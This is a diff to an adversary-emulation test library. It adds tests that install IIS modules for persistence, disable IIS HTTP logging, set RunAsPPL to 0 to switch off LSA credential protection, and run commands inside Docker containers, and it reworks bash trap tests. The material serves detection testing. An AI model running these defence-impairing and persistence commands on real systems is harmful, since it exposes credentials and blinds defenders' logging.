+## [Description from ATT&CK](https://attack.mitre.org/techniques/T1505/004)
+<blockquote>Adversaries may install malicious components that run on Internet Information Services (IIS) web servers to establish persistence. IIS provides several mechanisms to extend the functionality of the web servers. For example, Internet Server Application Programming Interface (ISAPI) extensions and filters can be installed to examine and/or modify incoming and outgoing IIS web requests. Extensions and filters are deployed as DLL files that export three functions: <code>Get{Extension/Filter}Version</code>, <code>Http{Extension/Filter}Proc</code>, and (optionally) <code>Terminate{Extension/Filter}</code>. IIS modules may also be installed to extend IIS web servers.(Citation: Microsoft ISAPI Extension Overview 2017)(Citation: Microsoft ISAPI Filter Overview 2017)(Citation: IIS Backdoor 2011)(Citation: Trustwave IIS Module 2013)
+
+Adversaries may install malicious ISAPI extensions and filters to observe and/or modify traffic, execute commands on compromised machines, or proxy command and control traffic. ISAPI extensions and filters may have access to all IIS web requests and responses. For example, an adversary may abuse these mechanisms to modify HTTP responses in order to distribute malicious commands/content to previously comprised hosts.(Citation: Microsoft ISAPI Filter Overview 2017)(Citation: Microsoft ISAPI Extension Overview 2017)(Citation: Microsoft ISAPI Extension All Incoming 2017)(Citation: Dell TG-3390)(Citation: Trustwave IIS Module 2013)(Citation: MMPC ISAPI Filter 2012)
+
+Adversaries may also install malicious IIS modules to observe and/or modify traffic. IIS 7.0 introduced modules that provide the same unrestricted access to HTTP requests and responses as ISAPI extensions and filters. IIS modules can be written as a DLL that exports <code>RegisterModule</code>, or as a .NET application that interfaces with ASP.NET APIs to access IIS HTTP requests.(Citation: Microsoft IIS Modules Overview 2007)(Citation: Trustwave IIS Module 2013)(Citation: ESET IIS Malware 2021)</blockquote>
+
+## Atomic Tests
+
+- [Atomic Test #1 - Install IIS Module using AppCmd.exe](#atomic-test-1---install-iis-module-using-appcmdexe)
+
+- [Atomic Test #2 - Install IIS Module using PowerShell Cmdlet New-WebGlobalModule](#atomic-test-2---install-iis-module-using-powershell-cmdlet-new-webglobalmodule)
+
+
+<br/>
+
+## Atomic Test #1 - Install IIS Module using AppCmd.exe
+The following Atomic will utilize AppCmd.exe to install a new IIS Module. IIS must be installed.
+This atomic utilizes a DLL on disk, but to test further suspiciousness, compile and load [IIS-Raid](https://www.mdsec.co.uk/2020/02/iis-raid-backdooring-iis-using-native-modules/).
+A successful execution will install a module into IIS using AppCmd.exe.
+[Managing and installing Modules Reference](https://learn.microsoft.com/en-us/iis/get-started/introduction-to-iis/iis-modules-overview#to-install-a-module-using-appcmdexe)
+[IIS Modules](https://www.microsoft.com/en-us/security/blog/2022/12/12/iis-modules-the-evolution-of-web-shells-and-how-to-detect-them/)
+
+**Supported Platforms:** Windows
+
+
+**auto_generated_guid:** 53adbdfa-8200-490c-871c-d3b1ab3324b2
+
+
+
+
+
+#### Inputs:
+| Name | Description | Type | Default Value |
+|------|-------------|------|---------------|
+| module_name | The name of the IIS module | String | DefaultDocumentModule_Atomic|
+| dll_path | The path to the DLL to be loaded | path | %windir%&#92;system32&#92;inetsrv&#92;defdoc.dll|
+
+
+#### Attack Commands: Run with `command_prompt`! 
+
+
+```cmd
+%windir%\system32\inetsrv\appcmd.exe install module /name:#{module_name} /image:#{dll_path}
+```
+
+#### Cleanup Commands:
+```cmd
+%windir%\system32\inetsrv\appcmd.exe uninstall module #{module_name}
+```
+
+
+
+#### Dependencies:  Run with `powershell`!
+##### Description: IIS must be installed in order to add a module to IIS.
+##### Check Prereq Commands:
+```powershell
+$service = get-service w3svc -ErrorAction SilentlyContinue
+if($service){ Write-Host "IIS installed on $env:computername" } else { Write-Host "IIS is not installed on $env:computername" }
+```
+##### Get Prereq Commands:
+```powershell
+Install IIS to continue.
+```
+
+
+
+
+<br/>
+<br/>
+
+## Atomic Test #2 - Install IIS Module using PowerShell Cmdlet New-WebGlobalModule
+The following Atomic will utilize PowerShell Cmdlet New-WebGlobalModule to install a new IIS Module. IIS must be installed.
+This atomic utilizes a DLL on disk, but to test further suspiciousness, compile and load [IIS-Raid](https://www.mdsec.co.uk/2020/02/iis-raid-backdooring-iis-using-native-modules/).
+A successful execution will install a module into IIS using New-WebGlobalModule.
+[Managing IIS Modules with PowerShell](https://learn.microsoft.com/en-us/powershell/module/webadministration/set-webglobalmodule?view=windowsserver2022-ps)
+[IIS Modules](https://www.microsoft.com/en-us/security/blog/2022/12/12/iis-modules-the-evolution-of-web-shells-and-how-to-detect-them/)
+
+**Supported Platforms:** Windows
+
+
+**auto_generated_guid:** cc3381fb-4bd0-405c-a8e4-6cacfac3b06c
+
+
+
+
+
+#### Inputs:
+| Name | Description | Type | Default Value |
+|------|-------------|------|---------------|
+| module_name | The name of the IIS module | String | DefaultDocumentModule_Atomic|
+| dll_path | The path to the DLL to be loaded | path | %windir%&#92;system32&#92;inetsrv&#92;defdoc.dll|
+
+
+#### Attack Commands: Run with `powershell`! 
+
+
+```powershell
+New-WebGlobalModule -Name #{module_name} -Image #{dll_path}
+```
+
+#### Cleanup Commands:
+```powershell
+Remove-WebGlobalModule -Name #{module_name}
+```
+
+
+
+#### Dependencies:  Run with `powershell`!
+##### Description: IIS must be installed in order to add a module to IIS.
+##### Check Prereq Commands:
+```powershell
+$service = get-service w3svc -ErrorAction SilentlyContinue
+if($service){ Write-Host "IIS installed on $env:computername" } else { Write-Host "IIS is not installed on $env:computername" }
+```
+##### Get Prereq Commands:
+```powershell
+Install IIS to continue.
+```
+
+
+
+
+<br/>

atomics/T1505.004/T1505.004.yaml

@@ -0,0 +1,71 @@
+attack_technique: T1505.004
+display_name: IIS Components
+atomic_tests:
+- name: Install IIS Module using AppCmd.exe
+  auto_generated_guid: 53adbdfa-8200-490c-871c-d3b1ab3324b2
+  description: |
+    The following Atomic will utilize AppCmd.exe to install a new IIS Module. IIS must be installed.
+    This atomic utilizes a DLL on disk, but to test further suspiciousness, compile and load [IIS-Raid](https://www.mdsec.co.uk/2020/02/iis-raid-backdooring-iis-using-native-modules/).
+    A successful execution will install a module into IIS using AppCmd.exe.
+    [Managing and installing Modules Reference](https://learn.microsoft.com/en-us/iis/get-started/introduction-to-iis/iis-modules-overview#to-install-a-module-using-appcmdexe)
+    [IIS Modules](https://www.microsoft.com/en-us/security/blog/2022/12/12/iis-modules-the-evolution-of-web-shells-and-how-to-detect-them/)
+  supported_platforms:
+  - windows
+  input_arguments:
+    module_name:
+      description: The name of the IIS module
+      type: String
+      default: DefaultDocumentModule_Atomic
+    dll_path:
+      description: The path to the DLL to be loaded
+      type: path
+      default: '%windir%\system32\inetsrv\defdoc.dll'
+  dependency_executor_name: powershell  
+  dependencies:
+  - description: |
+      IIS must be installed in order to add a module to IIS.
+    prereq_command: |
+      $service = get-service w3svc -ErrorAction SilentlyContinue
+      if($service){ Write-Host "IIS installed on $env:computername" } else { Write-Host "IIS is not installed on $env:computername" } 
+    get_prereq_command: |
+      Install IIS to continue.
+  executor:
+    command: |
+      %windir%\system32\inetsrv\appcmd.exe install module /name:#{module_name} /image:#{dll_path}
+    cleanup_command: |
+      %windir%\system32\inetsrv\appcmd.exe uninstall module #{module_name}
+    name: command_prompt
+- name: Install IIS Module using PowerShell Cmdlet New-WebGlobalModule
+  auto_generated_guid: cc3381fb-4bd0-405c-a8e4-6cacfac3b06c
+  description: |
+    The following Atomic will utilize PowerShell Cmdlet New-WebGlobalModule to install a new IIS Module. IIS must be installed.
+    This atomic utilizes a DLL on disk, but to test further suspiciousness, compile and load [IIS-Raid](https://www.mdsec.co.uk/2020/02/iis-raid-backdooring-iis-using-native-modules/).
+    A successful execution will install a module into IIS using New-WebGlobalModule.
+    [Managing IIS Modules with PowerShell](https://learn.microsoft.com/en-us/powershell/module/webadministration/set-webglobalmodule?view=windowsserver2022-ps)
+    [IIS Modules](https://www.microsoft.com/en-us/security/blog/2022/12/12/iis-modules-the-evolution-of-web-shells-and-how-to-detect-them/)
+  supported_platforms:
+  - windows
+  input_arguments:
+    module_name:
+      description: The name of the IIS module
+      type: String
+      default: DefaultDocumentModule_Atomic
+    dll_path:
+      description: The path to the DLL to be loaded
+      type: path
+      default: '%windir%\system32\inetsrv\defdoc.dll'
+  dependency_executor_name: powershell  
+  dependencies:
+  - description: |
+      IIS must be installed in order to add a module to IIS.
+    prereq_command: |
+      $service = get-service w3svc -ErrorAction SilentlyContinue
+      if($service){ Write-Host "IIS installed on $env:computername" } else { Write-Host "IIS is not installed on $env:computername" } 
+    get_prereq_command: |
+      Install IIS to continue.
+  executor:
+    command: |
+      New-WebGlobalModule -Name #{module_name} -Image #{dll_path}
+    cleanup_command: |
+      Remove-WebGlobalModule -Name #{module_name}
+    name: powershell

atomics/T1546.005/T1546.005.md

@@ -6,14 +6,16 @@ Adversaries can use this to register code to be executed when the shell encounte
 
 ## Atomic Tests
 
-- [Atomic Test #1 - Trap](#atomic-test-1---trap)
+- [Atomic Test #1 - Trap EXIT](#atomic-test-1---trap-exit)
+
+- [Atomic Test #2 - Trap SIGINT](#atomic-test-2---trap-sigint)
 
 
 <br/>
 
-## Atomic Test #1 - Trap
-After exiting the shell, the script will download and execute.
-After sending a keyboard interrupt (CTRL+C) the script will download and execute.
+## Atomic Test #1 - Trap EXIT
+Launch bash shell with command arg to create TRAP on EXIT.
+The trap executes script that writes to /tmp/art-fish.txt
 
 **Supported Platforms:** macOS, Linux
 
@@ -29,14 +31,49 @@ After sending a keyboard interrupt (CTRL+C) the script will download and execute
 
 
 ```sh
-trap "nohup sh $PathToAtomicsFolder/T1546.005/src/echo-art-fish.sh | bash" EXIT
-exit
-trap "nohup sh $PathToAtomicsFolder/T1546.005/src/echo-art-fish.sh | bash" SIGINt
+bash -c 'trap "nohup sh $PathToAtomicsFolder/T1546.005/src/echo-art-fish.sh" EXIT'
+```
+
+#### Cleanup Commands:
+```sh
+rm -f /tmp/art-fish.txt
 ```
 
 
 
 
 
+<br/>
+<br/>
+
+## Atomic Test #2 - Trap SIGINT
+Launch bash shell with command arg to create TRAP on SIGINT (CTRL+C), then send SIGINT signal.
+The trap executes script that writes to /tmp/art-fish.txt
+
+**Supported Platforms:** macOS, Linux
+
+
+**auto_generated_guid:** a547d1ba-1d7a-4cc5-a9cb-8d65e8809636
+
+
+
+
+
+
+#### Attack Commands: Run with `sh`! 
+
+
+```sh
+bash -c 'trap "nohup sh $PathToAtomicsFolder/T1546.005/src/echo-art-fish.sh" SIGINT && kill -SIGINT $$'
+```
+
+#### Cleanup Commands:
+```sh
+rm -f /tmp/art-fish.txt
+```
+
+
+
+
 
 <br/>

atomics/T1546.005/T1546.005.yaml

@@ -1,17 +1,31 @@
 attack_technique: T1546.005
 display_name: 'Event Triggered Execution: Trap'
 atomic_tests:
-- name: Trap
+- name: Trap EXIT
   auto_generated_guid: a74b2e07-5952-4c03-8b56-56274b076b61
   description: |
-    After exiting the shell, the script will download and execute.
-    After sending a keyboard interrupt (CTRL+C) the script will download and execute.
+    Launch bash shell with command arg to create TRAP on EXIT.
+    The trap executes script that writes to /tmp/art-fish.txt
   supported_platforms:
   - macos
   - linux
   executor:
     command: |
-      trap "nohup sh $PathToAtomicsFolder/T1546.005/src/echo-art-fish.sh | bash" EXIT
-      exit
-      trap "nohup sh $PathToAtomicsFolder/T1546.005/src/echo-art-fish.sh | bash" SIGINt
+      bash -c 'trap "nohup sh $PathToAtomicsFolder/T1546.005/src/echo-art-fish.sh" EXIT'
+    cleanup_command: |
+      rm -f /tmp/art-fish.txt
+    name: sh
+- name: Trap SIGINT
+  auto_generated_guid: a547d1ba-1d7a-4cc5-a9cb-8d65e8809636
+  description: |
+    Launch bash shell with command arg to create TRAP on SIGINT (CTRL+C), then send SIGINT signal.
+    The trap executes script that writes to /tmp/art-fish.txt
+  supported_platforms:
+  - macos
+  - linux
+  executor:
+    command: |
+      bash -c 'trap "nohup sh $PathToAtomicsFolder/T1546.005/src/echo-art-fish.sh" SIGINT && kill -SIGINT $$'
+    cleanup_command: |
+      rm -f /tmp/art-fish.txt
     name: sh

atomics/T1562.002/T1562.002.md

@@ -12,15 +12,17 @@ By disabling Windows event logging, adversaries can operate while leaving less e
 
 - [Atomic Test #1 - Disable Windows IIS HTTP Logging](#atomic-test-1---disable-windows-iis-http-logging)
 
-- [Atomic Test #2 - Kill Event Log Service Threads](#atomic-test-2---kill-event-log-service-threads)
+- [Atomic Test #2 - Disable Windows IIS HTTP Logging via PowerShell](#atomic-test-2---disable-windows-iis-http-logging-via-powershell)
 
-- [Atomic Test #3 - Impair Windows Audit Log Policy](#atomic-test-3---impair-windows-audit-log-policy)
+- [Atomic Test #3 - Kill Event Log Service Threads](#atomic-test-3---kill-event-log-service-threads)
 
-- [Atomic Test #4 - Clear Windows Audit Policy Config](#atomic-test-4---clear-windows-audit-policy-config)
+- [Atomic Test #4 - Impair Windows Audit Log Policy](#atomic-test-4---impair-windows-audit-log-policy)
 
-- [Atomic Test #5 - Disable Event Logging with wevtutil](#atomic-test-5---disable-event-logging-with-wevtutil)
+- [Atomic Test #5 - Clear Windows Audit Policy Config](#atomic-test-5---clear-windows-audit-policy-config)
 
-- [Atomic Test #6 - Makes Eventlog blind with Phant0m](#atomic-test-6---makes-eventlog-blind-with-phant0m)
+- [Atomic Test #6 - Disable Event Logging with wevtutil](#atomic-test-6---disable-event-logging-with-wevtutil)
+
+- [Atomic Test #7 - Makes Eventlog blind with Phant0m](#atomic-test-7---makes-eventlog-blind-with-phant0m)
 
 
 <br/>
@@ -67,7 +69,49 @@ if(Test-Path "C:\Windows\System32\inetsrv\appcmd.exe"){
 <br/>
 <br/>
 
-## Atomic Test #2 - Kill Event Log Service Threads
+## Atomic Test #2 - Disable Windows IIS HTTP Logging via PowerShell
+Disables HTTP logging on a Windows IIS web server as seen by Threat Group 3390 (Bronze Union).
+This action requires HTTP logging configurations in IIS to be unlocked.
+
+Use the cleanup commands to restore some default auditpol settings (your original settings will be lost)
+
+**Supported Platforms:** Windows
+
+
+**auto_generated_guid:** a957fb0f-1e85-49b2-a211-413366784b1e
+
+
+
+
+
+#### Inputs:
+| Name | Description | Type | Default Value |
+|------|-------------|------|---------------|
+| website_name | The name of the website on a server | String | Default Web Site|
+
+
+#### Attack Commands: Run with `powershell`! 
+
+
+```powershell
+set-WebConfigurationProperty -PSPath "IIS:\Sites\#{website_name}\" -filter "system.webServer/httpLogging" -name dontLog -value $true
+```
+
+#### Cleanup Commands:
+```powershell
+if(Test-Path "C:\Windows\System32\inetsrv\appcmd.exe"){
+  C:\Windows\System32\inetsrv\appcmd.exe set config "#{website_name}" /section:httplogging /dontLog:false *>$null
+}
+```
+
+
+
+
+
+<br/>
+<br/>
+
+## Atomic Test #3 - Kill Event Log Service Threads
 Kill Windows Event Log Service Threads using Invoke-Phant0m. WARNING you will need to restart PC to return to normal state with Log Service. https://artofpwn.com/phant0m-killing-windows-event-log.html
 
 **Supported Platforms:** Windows
@@ -107,7 +151,7 @@ Remove-Item "$env:TEMP\Invoke-Phant0m.ps1" -ErrorAction Ignore
 <br/>
 <br/>
 
-## Atomic Test #3 - Impair Windows Audit Log Policy
+## Atomic Test #4 - Impair Windows Audit Log Policy
 Disables the windows audit policy to prevent key host based telemetry being written into the event logs.
 [Solarigate example](https://www.microsoft.com/security/blog/2021/01/20/deep-dive-into-the-solorigate-second-stage-activation-from-sunburst-to-teardrop-and-raindrop/)
 
@@ -144,7 +188,7 @@ auditpol /set /category:"Logon/Logoff" /success:enable /failure:enable
 <br/>
 <br/>
 
-## Atomic Test #4 - Clear Windows Audit Policy Config
+## Atomic Test #5 - Clear Windows Audit Policy Config
 Clear the Windows audit policy using auditpol utility. This action would stop certain audit events from being recorded in the security log.
 
 **Supported Platforms:** Windows
@@ -179,7 +223,7 @@ auditpol /set /category:"Logon/Logoff" /success:enable /failure:enable
 <br/>
 <br/>
 
-## Atomic Test #5 - Disable Event Logging with wevtutil
+## Atomic Test #6 - Disable Event Logging with wevtutil
 Wevtutil can be used to disable logs. 
 NOTE: RansomEXX ransomware uses this to disable Security logs post-encryption.
 
@@ -217,7 +261,7 @@ wevtutil sl "#{log_name}" /e:true
 <br/>
 <br/>
 
-## Atomic Test #6 - Makes Eventlog blind with Phant0m
+## Atomic Test #7 - Makes Eventlog blind with Phant0m
 Use [Phant0m](https://github.com/hlldz/Phant0m) to disable Eventlog
 
 **Supported Platforms:** Windows

atomics/T1562.002/T1562.002.yaml

@@ -23,6 +23,28 @@ atomic_tests:
         C:\Windows\System32\inetsrv\appcmd.exe set config "#{website_name}" /section:httplogging /dontLog:false *>$null
       }
     name: powershell
+- name: Disable Windows IIS HTTP Logging via PowerShell
+  auto_generated_guid: a957fb0f-1e85-49b2-a211-413366784b1e
+  description: |
+    Disables HTTP logging on a Windows IIS web server as seen by Threat Group 3390 (Bronze Union).
+    This action requires HTTP logging configurations in IIS to be unlocked.
+
+    Use the cleanup commands to restore some default auditpol settings (your original settings will be lost)
+  supported_platforms:
+  - windows
+  input_arguments:
+    website_name:
+      description: The name of the website on a server
+      type: String
+      default: Default Web Site
+  executor:
+    command: |
+      set-WebConfigurationProperty -PSPath "IIS:\Sites\#{website_name}\" -filter "system.webServer/httpLogging" -name dontLog -value $true
+    cleanup_command: |
+      if(Test-Path "C:\Windows\System32\inetsrv\appcmd.exe"){
+        C:\Windows\System32\inetsrv\appcmd.exe set config "#{website_name}" /section:httplogging /dontLog:false *>$null
+      }
+    name: powershell
 - name: Kill Event Log Service Threads
   auto_generated_guid: 41ac52ba-5d5e-40c0-b267-573ed90489bd
   description: 'Kill Windows Event Log Service Threads using Invoke-Phant0m. WARNING you will need to restart PC to return to normal state with Log Service. https://artofpwn.com/phant0m-killing-windows-event-log.html'

atomics/T1562/T1562.md

@@ -0,0 +1,49 @@
+# T1562 - Impair Defenses
+## [Description from ATT&CK](https://attack.mitre.org/techniques/T1562)
+<blockquote>Adversaries may maliciously modify components of a victim environment in order to hinder or disable defensive mechanisms. This not only involves impairing preventative defenses, such as firewalls and anti-virus, but also detection capabilities that defenders can use to audit activity and identify malicious behavior. This may also span both native defenses as well as supplemental capabilities installed by users and administrators.
+
+Adversaries could also target event aggregation and analysis mechanisms, or otherwise disrupt these procedures by altering other system components.</blockquote>
+
+## Atomic Tests
+
+- [Atomic Test #1 - Windows Disable LSA Protection](#atomic-test-1---windows-disable-lsa-protection)
+
+
+<br/>
+
+## Atomic Test #1 - Windows Disable LSA Protection
+The following Atomic adds a registry entry to disable LSA Protection.
+
+The LSA controls and manages user rights information, password hashes and other important bits of information in memory. Attacker tools, such as mimikatz, rely on accessing this content to scrape password hashes or clear-text passwords. Enabling LSA Protection configures Windows to control the information stored in memory in a more secure fashion - specifically, to prevent non-protected processes from accessing that data.
+Upon successful execution, the registry will be modified and RunAsPPL will be set to 0, disabling Lsass protection.
+https://learn.microsoft.com/en-us/windows-server/security/credentials-protection-and-management/configuring-additional-lsa-protection#how-to-disable-lsa-protection
+https://blog.netwrix.com/2022/01/11/understanding-lsa-protection/
+https://thedfirreport.com/2022/03/21/phosphorus-automates-initial-access-using-proxyshell/
+
+**Supported Platforms:** Windows
+
+
+**auto_generated_guid:** 40075d5f-3a70-4c66-9125-f72bee87247d
+
+
+
+
+
+
+#### Attack Commands: Run with `command_prompt`!  Elevation Required (e.g. root or admin) 
+
+
+```cmd
+reg add HKLM\SYSTEM\CurrentControlSet\Control\LSA /v RunAsPPL /t REG_DWORD /d 0 /f
+```
+
+#### Cleanup Commands:
+```cmd
+reg delete HKLM\SYSTEM\CurrentControlSet\Control\LSA /v RunAsPPL /f >nul 2>&1
+```
+
+
+
+
+
+<br/>

atomics/T1562/T1562.yaml

@@ -0,0 +1,22 @@
+attack_technique: T1562
+display_name: 'Impair Defenses'
+atomic_tests:
+- name: Windows Disable LSA Protection
+  auto_generated_guid: 40075d5f-3a70-4c66-9125-f72bee87247d
+  description: |
+    The following Atomic adds a registry entry to disable LSA Protection.
+
+    The LSA controls and manages user rights information, password hashes and other important bits of information in memory. Attacker tools, such as mimikatz, rely on accessing this content to scrape password hashes or clear-text passwords. Enabling LSA Protection configures Windows to control the information stored in memory in a more secure fashion - specifically, to prevent non-protected processes from accessing that data.
+    Upon successful execution, the registry will be modified and RunAsPPL will be set to 0, disabling Lsass protection.
+    https://learn.microsoft.com/en-us/windows-server/security/credentials-protection-and-management/configuring-additional-lsa-protection#how-to-disable-lsa-protection
+    https://blog.netwrix.com/2022/01/11/understanding-lsa-protection/
+    https://thedfirreport.com/2022/03/21/phosphorus-automates-initial-access-using-proxyshell/  
+  supported_platforms:
+  - windows
+  executor:
+    command: |
+      reg add HKLM\SYSTEM\CurrentControlSet\Control\LSA /v RunAsPPL /t REG_DWORD /d 0 /f
+    cleanup_command: |
+      reg delete HKLM\SYSTEM\CurrentControlSet\Control\LSA /v RunAsPPL /f >nul 2>&1
+    name: command_prompt
+    elevation_required: true

atomics/T1609/T1609.md

@@ -8,6 +8,8 @@ In Docker, adversaries may specify an entrypoint during container deployment tha
 
 - [Atomic Test #1 - ExecIntoContainer](#atomic-test-1---execintocontainer)
 
+- [Atomic Test #2 - Docker Exec Into Container](#atomic-test-2---docker-exec-into-container)
+
 
 <br/>
 
@@ -59,4 +61,56 @@ echo "kubectl must be installed manually"
 
 
 
+<br/>
+<br/>
+
+## Atomic Test #2 - Docker Exec Into Container
+Attackers who have permissions, can run malicious commands in containers in the cluster using exec command (“docker exec”). In this method, attackers can use legitimate images, such as an OS image (e.g., Ubuntu) as a backdoor container, and run their malicious code remotely by using “docker exec”. Kinsing (Golang-based malware) was executed with an Ubuntu container entry point that runs shell scripts.
+
+**Supported Platforms:** Containers
+
+
+**auto_generated_guid:** 900e2c49-221b-42ec-ae3c-4717e41e6219
+
+
+
+
+
+#### Inputs:
+| Name | Description | Type | Default Value |
+|------|-------------|------|---------------|
+| command | Command to run | String | cat|
+
+
+#### Attack Commands: Run with `bash`! 
+
+
+```bash
+docker build -t t1609  $PathtoAtomicsFolder/T1609/src/ 
+docker run --name t1609_container --rm -itd t1609 bash /tmp/script.sh
+docker exec -i t1609_container bash -c "cat /tmp/output.txt"
+```
+
+#### Cleanup Commands:
+```bash
+docker stop t1609_container
+docker rmi -f t1609:latest
+```
+
+
+
+#### Dependencies:  Run with `bash`!
+##### Description: docker must be installed
+##### Check Prereq Commands:
+```bash
+which docker
+```
+##### Get Prereq Commands:
+```bash
+if [ "" == "`which docker`" ]; then echo "Docker Not Found"; if [ -n "`which apt-get`" ]; then sudo apt-get -y install docker ; elif [ -n "`which yum`" ]; then sudo yum -y install docker ; fi ; else echo "Docker installed"; fi
+```
+
+
+
+
 <br/>

atomics/T1609/T1609.yaml

@@ -31,3 +31,33 @@ atomic_tests:
       kubectl delete pod busybox -n #{namespace}
     name: bash
     elevation_required: false
+- name: Docker Exec Into Container
+  auto_generated_guid: 900e2c49-221b-42ec-ae3c-4717e41e6219
+  description: |
+    Attackers who have permissions, can run malicious commands in containers in the cluster using exec command (“docker exec”). In this method, attackers can use legitimate images, such as an OS image (e.g., Ubuntu) as a backdoor container, and run their malicious code remotely by using “docker exec”. Kinsing (Golang-based malware) was executed with an Ubuntu container entry point that runs shell scripts.
+
+  supported_platforms:
+   - containers
+  input_arguments:
+    command:
+      description: Command to run
+      type: String
+      default: cat
+  dependencies:
+  - description: |
+      docker must be installed
+    get_prereq_command: |
+      if [ "" == "`which docker`" ]; then echo "Docker Not Found"; if [ -n "`which apt-get`" ]; then sudo apt-get -y install docker ; elif [ -n "`which yum`" ]; then sudo yum -y install docker ; fi ; else echo "Docker installed"; fi
+    prereq_command: |
+      which docker
+  executor:
+    command: |
+      docker build -t t1609  $PathtoAtomicsFolder/T1609/src/ 
+      docker run --name t1609_container --rm -itd t1609 bash /tmp/script.sh
+      docker exec -i t1609_container bash -c "cat /tmp/output.txt"
+    cleanup_command: |
+      docker stop t1609_container
+      docker rmi -f t1609:latest 
+    name: bash
+    elevation_required: false
+

atomics/T1609/src/dockerfile

@@ -0,0 +1,5 @@
+FROM ubuntu
+ARG DEBIAN_FRONTEND=noninteractive
+
+RUN  echo "1" > /tmp/output.txt && \
+     echo ' bin/sh -c "while true; do sleep 30;done;"' > /tmp/script.sh && chmod +x /tmp/script.sh

atomics/used_guids.txt

@@ -1196,3 +1196,12 @@ b1cbdf8b-6078-48f5-a890-11ea19d7f8e9
 14fdc3f1-6fc3-4556-8d36-aa89d9d42d02
 84113186-ed3c-4d0d-8a3c-8980c86c1f4a
 5843529a-5056-4bc1-9c13-a311e2af4ca0
+999bff6d-dc15-44c9-9f5c-e1051bfc86e1
+40075d5f-3a70-4c66-9125-f72bee87247d
+fe7974e5-5813-477b-a7bd-311d4f535e83
+53adbdfa-8200-490c-871c-d3b1ab3324b2
+cc3381fb-4bd0-405c-a8e4-6cacfac3b06c
+a957fb0f-1e85-49b2-a211-413366784b1e
+3234117e-151d-4254-9150-3d0bac41e38c
+a547d1ba-1d7a-4cc5-a9cb-8d65e8809636
+900e2c49-221b-42ec-ae3c-4717e41e6219

bin/generate-atomic-docs.rb

@@ -211,7 +211,7 @@ class AtomicRedTeamDocs
 
     layer = {
       "name" => layer_name,
-      "versions" => {	"attack": "12",	"navigator": "4.7.1",	"layer": "4.3"	},
+      "versions" => {	"attack": "12",	"navigator": "4.7.1",	"layer": "4.4"	},
       "description" => layer_name + " MITRE ATT&CK Navigator Layer",
       "domain" => "enterprise-attack",
       "filters"=> filters,